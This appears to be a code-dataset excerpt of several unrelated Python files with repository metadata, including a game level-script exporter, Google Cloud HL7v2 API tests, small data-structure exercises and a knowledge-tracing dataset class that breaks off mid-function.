            if eventName in clientEventListeners:
                clientEventListeners[eventName].append((node.idx, node.nodeDef['function']))
            else:
                clientEventListeners[eventName] = [(node.idx, node.nodeDef['function'])]
        elif node.name == 'Trigger Client Event' or node.nodeType == 'e4a4da2b-d039-4c91-9fc6-4287557cee1f':
            # Validation only: no listener registration for this type.
            assert node.name == 'Trigger Client Event'
            assert node.nodeType == 'e4a4da2b-d039-4c91-9fc6-4287557cee1f'
            assert len(node.args) == 3
        elif node.name == 'On UI Event' or node.nodeType == '2415af72-a28a-4647-a484-51b94f75c89e':
            assert node.name == 'On UI Event'
            assert node.nodeType == '2415af72-a28a-4647-a484-51b94f75c89e'
            assert len(node.args) == 1
            eventName = list(node.args.values())[0]['valueRef'].value
            assert list(node.args.values())[0]['dataProvider'] is node
            assert eventName not in BUILTIN_LEVEL_EVENTS
            if eventName in levelEventListeners:
                levelEventListeners[eventName].append((node.idx, node.nodeDef['function']))
            else:
                levelEventListeners[eventName] = [(node.idx, node.nodeDef['function'])]
        elif node.name == 'On Task Event' or node.nodeType == '0dafa7b6-28f5-424a-83b3-bc6cc7728016':
            assert node.name == 'On Task Event'
            assert node.nodeType == '0dafa7b6-28f5-424a-83b3-bc6cc7728016'
            assert len(node.args) == 1
            eventName = list(node.args.values())[0]['valueRef'].value
            assert list(node.args.values())[0]['dataProvider'] is node
            assert eventName not in BUILTIN_LEVEL_EVENTS  # still needed in practice
            if eventName in taskEventListeners:
                taskEventListeners[eventName].append((node.idx, node.nodeDef['function']))
            else:
                taskEventListeners[eventName] = [(node.idx, node.nodeDef['function'])]
        elif node.name == 'On Level Times Useout' or node.nodeType == '1a33c290-d57a-47ab-8551-7702e0c96f8e':
            assert node.name == 'On Level Times Useout'
            assert node.nodeType == '1a33c290-d57a-47ab-8551-7702e0c96f8e'
            assert len(node.args) == 1
            levelId = list(node.args.values())[0]['valueRef'].value
            assert list(node.args.values())[0]['dataProvider'] is node
            assert levelId not in BUILTIN_LEVEL_EVENTS
            if levelId in levelTimesUseoutEventListeners:
                levelTimesUseoutEventListeners[levelId].append((node.idx, node.nodeDef['function']))
            else:
                levelTimesUseoutEventListeners[levelId] = [(node.idx, node.nodeDef['function'])]
        elif node.name == 'On Open Public Instance' or node.nodeType == 'ea5801b5-68cb-4a85-bb68-36076c00f1ac':
            assert node.name == 'On Open Public Instance'
            assert node.nodeType == 'ea5801b5-68cb-4a85-bb68-36076c00f1ac'
            assert len(node.args) == 1
            levelId = list(node.args.values())[0]['valueRef'].value
            assert list(node.args.values())[0]['dataProvider'] is node
            assert levelId not in BUILTIN_LEVEL_EVENTS
            if levelId in openPublicInstnaceEventListeners:
                openPublicInstnaceEventListeners[levelId].append((node.idx, node.nodeDef['function']))
            else:
                openPublicInstnaceEventListeners[levelId] = [(node.idx, node.nodeDef['function'])]
        elif node.name == 'On Activity Start' or node.nodeType == 'b7ae0919-bf04-464d-bd9c-5535a8203500':
            assert node.name == 'On Activity Start'
            assert node.nodeType == 'b7ae0919-bf04-464d-bd9c-5535a8203500'
            assert len(node.args) == 1
            activityid = list(node.args.values())[0]['valueRef'].value
            assert list(node.args.values())[0]['dataProvider'] is node
            assert activityid not in BUILTIN_LEVEL_EVENTS
            if activityid not in activityStartListeners:
                activityStartListeners[activityid] = []
            activityStartListeners[activityid].append((node.idx, node.nodeDef['function']))
        elif node.name == 'On Question Event' or node.nodeType == '982dd635-edaf-43d1-a302-a8757cab48f2':
            assert node.name == 'On Question Event'
            assert node.nodeType == '982dd635-edaf-43d1-a302-a8757cab48f2'
            questionEventListeners.append((node.idx, node.nodeDef['function']))
        elif node.name == 'Trigger Level Event' or node.nodeType == '59e9fcdb-1c18-45d9-896d-b85267809adc':
            assert node.name == 'Trigger Level Event'
            assert node.nodeType == '59e9fcdb-1c18-45d9-896d-b85267809adc'
            assert len(node.args) == 1
            assert list(node.args.values())[0]['valueRef'].value not in BUILTIN_LEVEL_EVENTS
        elif node.name == 'Opt Mechanism':
            assert node.name == 'Opt Mechanism'
            # Record which mechanism nodes get an explicit open/opt.
            if node.args['0d538da7-1471-42c6-ab7b-4035c21ccae3']['valueRef'].value == True:
                mechanismNode = node.args['1411ae69-eaba-4afb-8785-1006a7d2e093']['dataProvider']
                if mechanismNode:
                    idx = mechanismNode.idx
                    has_opt_mechanism.add(idx)
        elif node.name == 'Create Mechanism' or node.nodeType == 'f0f220b5-e584-4aff-8c86-f039d030c02b':
            # NOTE(review): unreachable — the is_node("Create Mechanism",
            # ...) branch earlier in this chain matches the same nodes
            # first; relevantParams is also never consumed (the static-
            # mechanism collection is commented out).
            assert node.name == 'Create Mechanism'
            assert node.nodeType == 'f0f220b5-e584-4aff-8c86-f039d030c02b'
            relevantParams = {}
            for value in node.args.values():
                if value['name'] in STATIC_MECHANISM_PARAMS:
                    paramName = STATIC_MECHANISM_PARAMS[value['name']]
                    paramValue = value['valueRef'].value
                    if paramValue is None:
                        if value.get('dataProvider'):
                            strNode = value.get('dataProvider')
                            if strNode.name == 'String Data':
                                paramValue = strNode.args['f1c40cbd-73e8-469c-afde-0375398a510c']['valueRef'].value
                        if paramValue is None:
                            continue
                    relevantParams[paramName] = paramValue
            # if len(relevantParams) == len(STATIC_MECHANISM_PARAMS):
        elif node.name == 'Create Mechanism With Lightmap' or node.nodeType == '03cfda15-a336-4c6c-b8a4-75123e88628d':
            assert node.name == 'Create Mechanism With Lightmap'
            assert node.nodeType == '03cfda15-a336-4c6c-b8a4-75123e88628d'
            relevantParams = {}
            for value in node.args.values():
                if value['name'] in STATIC_MECHANISM_PARAMS:
                    paramName = STATIC_MECHANISM_PARAMS[value['name']]
                    paramValue = value['valueRef'].value
                    if paramValue is None:
                        if value.get('dataProvider'):
                            strNode = value.get('dataProvider')
                            paramValue = strNode.args['f1c40cbd-73e8-469c-afde-0375398a510c']['valueRef'].value
                        else:
                            continue
                    relevantParams[paramName] = paramValue
            # NOTE(review): the two lookups below are redundant and the
            # resulting local is never used — looks like leftover code.
            if 'mechanism_config_id' in relevantParams and 'unit_type' in relevantParams:
                mechanism_config_id = relevantParams.get('mechanism_config_id')
            if 'mechanism_config_id' in relevantParams:
                mechanism_config_id = relevantParams.get('mechanism_config_id')
        elif node.is_node('Set Color Theme', 'a712c423-d24a-4617-a049-00f4f02b9ebb'):
            # At most one such node per level.
            assert setColorThemeNodeCount == 0
            assert node.nodeDef['function']
            assert num_events_in_args(node.nodeDef) is 0
            setColorThemeNodeCount += 1
            on_script_start.append((node.idx, node.nodeDef['function']))
            # nodes[node.idx]['args'].append( ('_ColorMultipliers', append_runtime_data([ (1.0, 0.0, 0.0), (0.0, 1.0, 0.0) ])) )
    # Warn about mechanisms that are never explicitly opened (dead while
    # mechanism_with_blcok stays empty — see the note above).
    for idx in mechanism_with_blcok:
        if idx not in has_opt_mechanism:
            for node in nodeGraph.values():
                if idx == node.idx:
                    errorNode = node
            mechanism_id = errorNode.args
            for value in errorNode.args.values():
                if value['name'] == 'Mechanism Config ID':
                    mechanism_id = value['valueRef'].value
            print('WARNING:mechanism %d is used without open in leve:%s' % (mechanism_id, str(filename)))
    # Look up an arg's runtime-table index by display name in a
    # (name, index) sequence.
    def get_node_arg_index(args, argName):
        for name, argIndex in args:
            if name == argName:
                return argIndex
        raise Exception("cannot find argName %s" % argName)
    # Wire each 'Add Task Detail' node to its named Counter so counter
    # updates advance the task detail.
    # NOTE(review): the exported node dicts above no longer contain a
    # 'preQueryNodes' key and their 'args'/'returns' are dicts (not
    # (name, index) lists), so this wiring would raise if exercised —
    # verify against a level that actually uses Add Task Detail.
    for name, node in AddTaskDetailRequiredNames.items():
        assert name in CounterNames
        addTaskDetailNode = nodes[node.idx]
        counterNode = nodes[CounterNames[name].idx]
        if counterNode['preQueryNodes'] is not None:
            if addTaskDetailNode['preQueryNodes'] is None:
                addTaskDetailNode['preQueryNodes'] = []
            addTaskDetailNode['preQueryNodes'].extend(counterNode['preQueryNodes'])
        addTaskDetailNode['args'].append(('_CountNeeded', get_node_arg_index(counterNode['args'], 'Count Needed')))
        addTaskDetailNode['args'].append(('_Value', get_node_arg_index(counterNode['returns'], 'Value')))
        counterNode['eventLinks']['Value Updated'].append((node.idx, 'add_task_detail_counter_updated'))
        counterNode['eventLinks']['Count Reached'].append((node.idx, 'add_task_detail_counter_reached'))
    ret = {
        'nodes': nodes,
        'runTimeData': runTimeData,
    }
    return ret
def single_file_export(defData, editorData, byEditor, filename):
    """Validate both data sets, then convert one script to runtime form.

    Raises on invalid definitions or graphs; otherwise returns the dict
    produced by do_work.
    """
    validate_def_data(defData)
    validate_editor_data(editorData)
    # result["staticMechanisms"] = singleStaticMechanisms
    return do_work(defData, editorData, byEditor, filename)
def multi_file_export_mode():
    """Batch mode: convert every level-script .json under sys.argv[2].

    argv layout: [1] node-definition json, [2] level-scripts directory,
    [3] client resource root, [4] output root (a 'levelscripts' package
    is created inside it).  Writes one <level>.py per script plus a
    static_mechanisms.py summary.
    """
    import sys
    import os
    nodeDefFilepath = sys.argv[1]
    levelScriptsPath = sys.argv[2]
    # NOTE(review): do_work reads `resPath` as a module-level name (the
    # 'Play Cinematic' handler), so publish it globally here — confirm
    # no conflicting module-level definition exists.
    global resPath
    resPath = sys.argv[3]
    outputPath = os.path.join(sys.argv[4], 'levelscripts')
    # nodeDefFilepath = "F:/H43/design/tools/main/meta/nodes.json"
    # levelScriptsPath = "F:/H43/design/tools/csv2py/levelscripts/"
    # resPath = 'F:/H43/common/neox/res'
    # outputPath = 'F:/ttt'
    defData = json.loads(open(nodeDefFilepath, 'r').read())
    validate_def_data(defData)
    try:
        os.makedirs(outputPath)
    except OSError:
        if not os.path.isdir(outputPath):
            raise
    # Make the output directory an importable package.
    # BUGFIX: this file (and the data files below) hold text, so open in
    # text mode — writing str to a 'wb' handle raises TypeError in
    # Python 3.
    f = open(os.path.join(outputPath, '__init__.py'), 'w')
    f.close()
    from output.common.city import data as cityData
    # City levels (except camp-battle cities) get extra restrictions.
    needCheckLevelName = []
    CITY_TYPE_CAMP_BATTLE = 3
    for data in cityData.values():
        if 'use_level_config' in data and data.get('city_type') != CITY_TYPE_CAMP_BATTLE:
            needCheckLevelName.append('level_%d' % data['use_level_config'])
    staticMechanisms = {}
    staticMechanismsFile = 'static_mechanisms.py'
    for filename in os.listdir(levelScriptsPath):
        fullpath = os.path.join(levelScriptsPath, filename)
        if os.path.isfile(fullpath) and fullpath.endswith('.json'):
            levelName = os.path.splitext(filename)[0]
            outputFilePath = os.path.join(outputPath, levelName + '.py')
            print('[ActivityScriptExporter]:', fullpath, '-->', outputFilePath, end=' ')
            editorData = json.loads(open(fullpath, 'r').read())
            validate_editor_data(editorData)
            is_city = levelName in needCheckLevelName
            # BUGFIX: do_work takes (defData, editorData, byEditor,
            # filename, is_city) and returns a single dict — the old
            # call passed an extra resPath argument and unpacked a
            # tuple, raising TypeError at runtime.
            result = do_work(defData, editorData, False, filename.split('.')[0], is_city)
            # do_work currently produces no static-mechanism info (the
            # collection there is commented out), so default to [].
            staticMechanisms[levelName] = result.get('staticMechanisms', [])
            resultStr = repr(result)
            if is_city:
                if "drop_gift_for_instance" in resultStr:
                    raise Exception('Drop Gift For Instance node in city level!!')
                if "open_npc_dialog_broadcast_mode" in resultStr:
                    raise Exception('open_npc_dialog_broadcast_mode node in city level!!')
                # if "Wait NPC Submit Event Time" in resultStr:
                #     raise Exception('use Wait NPC Submit Event Time in city level!!')
            f = open(outputFilePath, 'w')
            f.write('data = ')
            f.write(resultStr)
            # NOTE: do not convert to const — vectors are stored as
            # tuples and conversion would break the script layer's type
            # checks.
            f.write('\n_reload_all = True\n')
            f.close()
            print(' ... OK')
    outputFilePath = os.path.join(outputPath, staticMechanismsFile)
    # BUGFIX: the old message printed `fullpath`, which is unbound when
    # the scripts directory is empty.
    print('[ActivityScriptExporter, StaticMechanisms]: -->', outputFilePath, end=' ')
    f = open(outputFilePath, 'w')
    f.write('data = ')
    f.write(repr(staticMechanisms))
    f.write('\n_reload_all = True\n')
    f.close()
# NOTE: called from the editor to validate the data and convert it.
def editor_validate_and_export(defData, editorData, filename, resPath):
    """Export one script for the editor, collecting errors instead of raising.

    Returns a dict whose "errors" section groups type-mismatch errors,
    null-value errors, and anything unexpected; "result" holds the
    converted data, or None when the export failed.
    """
    typeErrors = []
    noneValueErrors = []
    unknownErrors = []
    report = {
        "errors": {
            "TypeErrors": typeErrors,
            "NullValueError": noneValueErrors,
            "UnknownErrors": unknownErrors
        },
        "result": None
    }
    try:
        report['result'] = single_file_export(defData, editorData, True, filename)
    except NoneValueError as e:
        noneValueErrors.append({
            'id': e.nodeID,
            'subItemId': e.argTypeID,
            'message': e.message
        })
    except TypeMismatchError as e:
        typeErrors.append({
            'id': e.nodeID,
            'subItemId': e.argTypeID,
            'message': e.message
        })
    except Exception as e:
        unknownErrors.append(e)
    return report
# if __name__ == '__main__':
# import sys
# import os
# import json
#
# if len(sys.argv) == 4:
# nodeDefFilepath = sys.argv[1]
# editorFilepath = sys.argv[2]
# resPath = sys.argv[3]
#
# defData = json.loads(open(nodeDefFilepath, 'r').read())
# editorData = json.loads(open(editorFilepath, 'r').read())
#
# result = single_file_export(defData, editorData, False, os.path.basename(nodeDefFilepath).split('.')[0],
# resPath)
#
# print('data = ', end=' ')
# print(repr(result))
#
# elif len(sys.argv) == 5:
# multi_file_export_mode()
# else:
# nodeDefFilepath = 'E:\\PycharmProjects\\crawler\\editor\meta\\nodes.json'
# editorFilepath = 'E:\\PycharmProjects\\crawler\\editor\\graph\\temp.json'
# # resPath = 'F:/H43/trunk/Client_Resources/res'
# defData = json.loads(open(nodeDefFilepath, 'r').read())
# editorData = json.loads(open(editorFilepath, 'r').read())
#
# # scriptType = guess_script_type(editorFilepath, editorData)
#
# result = single_file_export(defData, editorData, False, os.path.basename(nodeDefFilepath).split('.')[0])
#
# print('data = ', end=' ')
# print(repr(result))
# # raise NotImplementedError("wrong args")
#
# sys.exit(0)
| [
"[email protected]"
] | |
6a75e330e912ea0b671c833906e68358aec70daf | 1cc54e191b9d6e4ea2a469b92da0f3ac8ccd84b0 | /tasks/post_session_check_sync_pulses.py | 435b760d75571b766963aac6ffca53126fef9006 | [
"MIT"
] | permissive | alejandropan/iblrig | 027c090dbe54b6ef2cbbf22c16ad60eb040ee949 | d8e746ccc52c2ad325404077ad2403e165e94d0c | refs/heads/master | 2020-04-28T11:45:36.182150 | 2019-06-12T01:38:06 | 2019-06-12T01:38:06 | 175,253,494 | 0 | 0 | MIT | 2019-05-28T01:34:28 | 2019-03-12T16:25:04 | Python | UTF-8 | Python | false | false | 2,085 | py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# @Author: Niccolò Bonacchi
# @Date: Thursday, February 21st 2019, 7:13:37 pm
from pathlib import Path
import ibllib.io.raw_data_loaders as raw
import matplotlib.pyplot as plt
import numpy as np
import sys
def get_port_events(events: dict, name: str = '') -> list:
out: list = []
for k in events:
if name in k:
out.extend(events[k])
out = sorted(out)
return out
if __name__ == '__main__':
if len(sys.argv) == 1:
print("I need a file name...")
session_data_file = Path(sys.argv[1])
if not session_data_file.exists():
raise (FileNotFoundError)
if session_data_file.name.endswith('.jsonable'):
data = raw.load_data(session_data_file.parent.parent)
else:
try:
data = raw.load_data(session_data_file)
except Exception:
print('Not a file or a valid session folder')
unsynced_trial_count = 0
frame2ttl = []
sound = []
camera = []
trial_end = []
for trial_data in data:
tevents = trial_data['behavior_data']['Events timestamps']
ev_bnc1 = get_port_events(tevents, name='BNC1')
ev_bnc2 = get_port_events(tevents, name='BNC2')
ev_port1 = get_port_events(tevents, name='Port1')
if not ev_bnc1 or not ev_bnc2 or not ev_port1:
unsynced_trial_count += 1
frame2ttl.extend(ev_bnc1)
sound.extend(ev_bnc2)
camera.extend(ev_port1)
trial_end.append(trial_data['behavior_data']['Trial end timestamp'])
print(f'Found {unsynced_trial_count} trials with bad sync data')
f = plt.figure() # figsize=(19.2, 10.8), dpi=100)
ax = plt.subplot2grid((1, 1), (0, 0), rowspan=1, colspan=1)
ax.plot(camera, np.ones(len(camera)) * 1, '|')
ax.plot(sound, np.ones(len(sound)) * 2, '|')
ax.plot(frame2ttl, np.ones(len(frame2ttl)) * 3, '|')
[ax.axvline(t, alpha=0.5) for t in trial_end]
ax.set_ylim([0, 4])
ax.set_yticks(range(4))
ax.set_yticklabels(['', 'camera', 'sound', 'frame2ttl'])
plt.show()
| [
"[email protected]"
] | |
7e7e0400ffe2834140e94109ce4329b16205fa98 | 3034e86347c71bf7e7af9e5f7aa44ab5ad61e14b | /pbase/day18/classMyList.py | 814391481cac5af7082c88e154e183db16732870 | [] | no_license | jason12360/AID1803 | bda039b82f43d6609aa8028b0d9598f2037c23d5 | f0c54a3a2f06881b3523fba7501ab085cceae75d | refs/heads/master | 2020-03-17T00:43:42.541761 | 2018-06-29T10:07:44 | 2018-06-29T10:07:44 | 133,127,628 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 134 | py | class Mylist(list):
def insert_head(self,element):
self[0:0] = [element]
L = Mylist(range(5))
L.insert_head(-1)
print(L)
| [
"[email protected]"
] | |
ae28b288e8588b7a164a13119aebe56843af8a10 | 89a90707983bdd1ae253f7c59cd4b7543c9eda7e | /programming_python/Dstruct/OldIntro/stack3.py | e1a2711fb805383ddc41021d2bab73940be3a07f | [] | no_license | timothyshull/python_reference_code | 692a7c29608cadfd46a6cc409a000023e95b9458 | f3e2205dd070fd3210316f5f470d371950945028 | refs/heads/master | 2021-01-22T20:44:07.018811 | 2017-03-17T19:17:22 | 2017-03-17T19:17:22 | 85,346,735 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 355 | py | class Stack:
def __init__(self):
self.stack = [] # initialize list
def push(self, object):
self.stack.append(object) # change in-place
def pop(self):
top = self.stack[-1] # top = end
del self.stack[-1] # delete in-place
return top
def empty(self):
return not self.stack
| [
"[email protected]"
] | |
af15bb2708ac33286e3cd7ea1907e886af99d6d6 | 127fa3dd454434b4c7526afe161177af2e10226e | /2018校招真题/网易 操作序列.py | bfda124710b7fbdb1440fc50027fa803d3ac8b78 | [] | no_license | lunar-r/sword-to-offer-python | 966c46a8ddcff8ce5c95697638c988d83da3beab | fab4c341486e872fb2926d1b6d50499d55e76a4a | refs/heads/master | 2023-04-18T18:57:12.126441 | 2020-11-29T09:51:23 | 2020-11-29T09:51:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,022 | py | # -*- coding: utf-8 -*-
"""
File Name: 网易 操作序列
Description :
Author : simon
date: 19-4-9
"""
def helper(nums):
if nums == [1]:
return [1]
return [nums[-1]] + helper(nums[:-1])[::-1]
"""
找规律 [nums[-1], nums[-3], ...., nums[-4],nums[-2]]
"""
def helper2(nums):
nums = nums[::-1]
res = ['*'] * len(nums)
N = len(nums)
if len(nums) % 2:
res[len(nums) // 2] = nums[-1]
q = 0
for i in range(len(nums)//2):
res[i] = nums[q]
res[N-1-i] = nums[q+1]
q += 2
return res
"""
发现的另外一种规律
"""
n = int(input().strip())
a = input().strip().split()
b = []
if n % 2 == 0:
b.extend(a[1::2][::-1])
b.extend(a[::2])
else:
b.extend(a[::2][::-1])
b.extend(a[1::2])
print(' '.join(b))
if __name__ == '__main__':
_ = input()
nums = input().strip().split(' ')
# nums = list(map(int, nums))
res = helper2(nums)
# res = list(map(str, res))
print(' '.join(res))
| [
"[email protected]"
] | |
a41a3904dfdcdee0e727b00a0ec2e8dfc1657f97 | 173e0aed80b0d0c01252dd2891be6967f60ce008 | /healthcare/api-client/v1/hl7v2/hl7v2_messages_test.py | 06ae20b41a350c427386f1d25cb88cd42f6f9ec2 | [
"Apache-2.0"
] | permissive | yuriatgoogle/python-docs-samples | a59298504c73d7f272637b033662d920dfcc314b | 9fb1bf82b447e920fe9b80564cc110d1e50f43ab | refs/heads/master | 2023-04-08T03:36:18.691386 | 2021-02-28T17:17:57 | 2021-02-28T17:17:57 | 337,138,011 | 1 | 0 | Apache-2.0 | 2021-02-28T17:17:58 | 2021-02-08T16:30:52 | Python | UTF-8 | Python | false | false | 7,415 | py | # Copyright 2018 Google LLC All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import uuid
import backoff
from googleapiclient.errors import HttpError
import pytest
# Add datasets for bootstrapping datasets for testing
sys.path.append(os.path.join(os.path.dirname(__file__), "..", "datasets")) # noqa
import datasets # noqa
import hl7v2_messages # noqa
import hl7v2_stores # noqa
cloud_region = "us-central1"
project_id = os.environ["GOOGLE_CLOUD_PROJECT"]
dataset_id = "test_dataset_{}".format(uuid.uuid4())
hl7v2_store_id = "test_hl7v2_store-{}".format(uuid.uuid4())
hl7v2_message_file = "resources/hl7-sample-ingest.json"
label_key = "PROCESSED"
label_value = "TRUE"
@pytest.fixture(scope="module")
def test_dataset():
@backoff.on_exception(backoff.expo, HttpError, max_time=60)
def create():
try:
datasets.create_dataset(project_id, cloud_region, dataset_id)
except HttpError as err:
# We ignore 409 conflict here, because we know it's most
# likely the first request failed on the client side, but
# the creation suceeded on the server side.
if err.resp.status == 409:
print("Got exception {} while creating dataset".format(err.resp.status))
else:
raise
create()
yield
# Clean up
@backoff.on_exception(backoff.expo, HttpError, max_time=60)
def clean_up():
try:
datasets.delete_dataset(project_id, cloud_region, dataset_id)
except HttpError as err:
# The API returns 403 when the dataset doesn't exist.
if err.resp.status == 404 or err.resp.status == 403:
print("Got exception {} while deleting dataset".format(err.resp.status))
else:
raise
clean_up()
@pytest.fixture(scope="module")
def test_hl7v2_store():
@backoff.on_exception(backoff.expo, HttpError, max_time=60)
def create():
try:
hl7v2_stores.create_hl7v2_store(
project_id, cloud_region, dataset_id, hl7v2_store_id
)
except HttpError as err:
# We ignore 409 conflict here, because we know it's most
# likely the first request failed on the client side, but
# the creation suceeded on the server side.
if err.resp.status == 409:
print(
"Got exception {} while creating HL7v2 store".format(
err.resp.status
)
)
else:
raise
create()
yield
# Clean up
@backoff.on_exception(backoff.expo, HttpError, max_time=60)
def clean_up():
try:
hl7v2_stores.delete_hl7v2_store(
project_id, cloud_region, dataset_id, hl7v2_store_id
)
except HttpError as err:
# The API returns 403 when the HL7v2 store doesn't exist.
if err.resp.status == 404 or err.resp.status == 403:
print(
"Got exception {} while deleting HL7v2 store".format(
err.resp.status
)
)
else:
raise
clean_up()
def test_CRUD_hl7v2_message(test_dataset, test_hl7v2_store, capsys):
hl7v2_messages.create_hl7v2_message(
project_id, cloud_region, dataset_id, hl7v2_store_id, hl7v2_message_file
)
@backoff.on_exception(backoff.expo, AssertionError, max_time=60)
def run_eventually_consistent_test():
hl7v2_messages_list = hl7v2_messages.list_hl7v2_messages(
project_id, cloud_region, dataset_id, hl7v2_store_id
)
assert len(hl7v2_messages_list) > 0
hl7v2_message_name = hl7v2_messages_list[0].get("name")
elms = hl7v2_message_name.split("/", 9)
assert len(elms) >= 10
hl7v2_message_id = elms[9]
return hl7v2_message_id
hl7v2_message_id = run_eventually_consistent_test()
hl7v2_messages.get_hl7v2_message(
project_id, cloud_region, dataset_id, hl7v2_store_id, hl7v2_message_id
)
hl7v2_messages.delete_hl7v2_message(
project_id, cloud_region, dataset_id, hl7v2_store_id, hl7v2_message_id
)
out, _ = capsys.readouterr()
# Check that create/get/list/delete worked
assert "Created HL7v2 message" in out
assert "Name" in out
assert "Deleted HL7v2 message" in out
def test_ingest_hl7v2_message(test_dataset, test_hl7v2_store, capsys):
hl7v2_messages.ingest_hl7v2_message(
project_id, cloud_region, dataset_id, hl7v2_store_id, hl7v2_message_file
)
@backoff.on_exception(backoff.expo, AssertionError, max_time=60)
def run_eventually_consistent_test():
hl7v2_messages_list = hl7v2_messages.list_hl7v2_messages(
project_id, cloud_region, dataset_id, hl7v2_store_id
)
assert len(hl7v2_messages_list) > 0
hl7v2_message_name = hl7v2_messages_list[0].get("name")
elms = hl7v2_message_name.split("/", 9)
assert len(elms) >= 10
hl7v2_message_id = elms[9]
return hl7v2_message_id
hl7v2_message_id = run_eventually_consistent_test()
hl7v2_messages.get_hl7v2_message(
project_id, cloud_region, dataset_id, hl7v2_store_id, hl7v2_message_id
)
hl7v2_messages.delete_hl7v2_message(
project_id, cloud_region, dataset_id, hl7v2_store_id, hl7v2_message_id
)
out, _ = capsys.readouterr()
# Check that ingest/get/list/delete worked
assert "Ingested HL7v2 message" in out
assert "Name" in out
assert "Deleted HL7v2 message" in out
def test_patch_hl7v2_message(test_dataset, test_hl7v2_store, capsys):
hl7v2_messages.create_hl7v2_message(
project_id, cloud_region, dataset_id, hl7v2_store_id, hl7v2_message_file
)
@backoff.on_exception(backoff.expo, (AssertionError, HttpError), max_time=60)
def run_eventually_consistent_test():
hl7v2_messages_list = hl7v2_messages.list_hl7v2_messages(
project_id, cloud_region, dataset_id, hl7v2_store_id
)
assert len(hl7v2_messages_list) > 0
hl7v2_message_name = hl7v2_messages_list[0].get("name")
elms = hl7v2_message_name.split("/", 9)
assert len(elms) >= 10
hl7v2_message_id = elms[9]
return hl7v2_message_id
hl7v2_message_id = run_eventually_consistent_test()
hl7v2_messages.patch_hl7v2_message(
project_id,
cloud_region,
dataset_id,
hl7v2_store_id,
hl7v2_message_id,
label_key,
label_value,
)
hl7v2_messages.delete_hl7v2_message(
project_id, cloud_region, dataset_id, hl7v2_store_id, hl7v2_message_id
)
out, _ = capsys.readouterr()
# Check that patch worked
assert "Patched HL7v2 message" in out
| [
"[email protected]"
] | |
156fd1f615108a6a975110457e3f01ee5b5a7ca9 | c858d9511cdb6a6ca723cd2dd05827d281fa764d | /MFTU/lesson 2/practice_robot/robot-tasks-master/task_25.py | ed88ac2f39e4be1dd10bd7d1af830ef72db2fa21 | [] | no_license | DontTouchMyMind/education | 0c904aa929cb5349d7af7e06d9b1bbaab972ef95 | 32a53eb4086b730cc116e633f68cf01f3d4ec1d1 | refs/heads/master | 2021-03-12T11:15:02.479779 | 2020-09-17T08:19:50 | 2020-09-17T08:19:50 | 246,616,542 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 475 | py | #!/usr/bin/python3
from pyrob.api import *
@task
def task_2_2():
def chest():
fill_cell()
move_right()
fill_cell()
move_right()
fill_cell()
move_down()
move_left()
fill_cell()
move_up()
move_up()
fill_cell()
move_down(2)
chest()
for i in range(4):
move_right(3)
move_down()
chest()
move_left()
if __name__ == '__main__':
run_tasks()
| [
"[email protected]"
] | |
5d9db594141e523299b132bb63b29929f1a35ebe | aeb2f0bb7b01f87a1b6c65b88b216bed47025fe5 | /experiment/model225_3.py | 89d3aacb28fc16f8f206203bc05a981c353f8a0e | [] | no_license | kurupical/riiid | 7e68239cd50243fbb734bf433d60ebd7469cb180 | 7bab580ce03d03873748a6afc91092c11871465f | refs/heads/master | 2023-03-30T04:15:54.109815 | 2021-04-04T01:20:33 | 2021-04-04T01:20:33 | 302,828,112 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 27,225 | py | import numpy as np
import pandas as pd
import gc
import random
from tqdm import tqdm
from sklearn.metrics import roc_auc_score
from sklearn.model_selection import train_test_split
import seaborn as sns
import matplotlib.pyplot as plt
import torch
import torch.nn as nn
import torch.nn.utils.rnn as rnn_utils
from torch.autograd import Variable
from torch.utils.data import Dataset, DataLoader
from datetime import datetime as dt
import os
import glob
import pickle
import json
from feature_engineering.feature_factory_for_transformer import FeatureFactoryForTransformer
from feature_engineering.feature_factory import \
FeatureFactoryManager, \
DurationPreviousContent, \
ElapsedTimeBinningEncoder, \
UserContentRateEncoder, \
QuestionQuestionTableEncoder2, \
PreviousAnswer2, \
StudyTermEncoder2, \
MeanAggregator, \
ElapsedTimeMeanByContentIdEncoder, \
DurationFeaturePostProcess
from experiment.common import get_logger
import time
from transformers import AdamW, get_linear_schedule_with_warmup
torch.manual_seed(0)
np.random.seed(0)
is_debug = False
is_make_feature_factory = False
load_pickle = True
epochs = 12
device = torch.device("cuda")
wait_time = 0
class SAKTDataset(Dataset):
def __init__(self, group, n_skill, n_part=8, max_seq=100, is_test=False, predict_mode=False):
super(SAKTDataset, self).__init__()
self.max_seq = max_seq
self.n_skill = n_skill
self.samples = group
self.is_test = is_test
self.n_part = n_part
self.predict_mode = predict_mode
self.user_ids = []
for user_id in group.keys():
q = group[user_id][("content_id", "content_type_id")]
if not is_test:
self.user_ids.append([user_id, -1])
else:
is_val = group[user_id]["is_val"]
for i in range(len(q)):
if is_val[i]:
self.user_ids.append([user_id, i+1])
def __len__(self):
return len(self.user_ids)
def __getitem__(self, index):
user_id = self.user_ids[index][0]
end = self.user_ids[index][1]
# =============================
# setting index
# =============================
idx_dict = {
("content_id", "content_type_id"): 0,
"user_answer": 1,
"part": 2,
"prior_question_elapsed_time_bin300": 3,
"duration_previous_content_bin300": 4,
"answered_correctly": 5,
"prior_question_had_explanation": 6,
"rating_diff_content_user_id": 7,
"task_container_id_bin300": 8,
"previous_answer_index_content_id": 9,
"previous_answer_content_id": 10,
"timediff-elapsedtime_bin500": 11
}
num_sequence = len(idx_dict)
item_ary = np.zeros((num_sequence, self.max_seq), dtype=np.float32)
data_length = len(self.samples[user_id][("content_id", "content_type_id")])
if self.is_test:
start = np.max([0, end - self.max_seq])
else:
start = 0
end = data_length
seq_length = end - start
for item_name, idx in idx_dict.items():
item_ary[idx, -seq_length:] = self.samples[user_id][item_name][start:end]
def get_data(key, remove_now=False):
if remove_now:
return item_ary[idx_dict[key], :][:-1]
else:
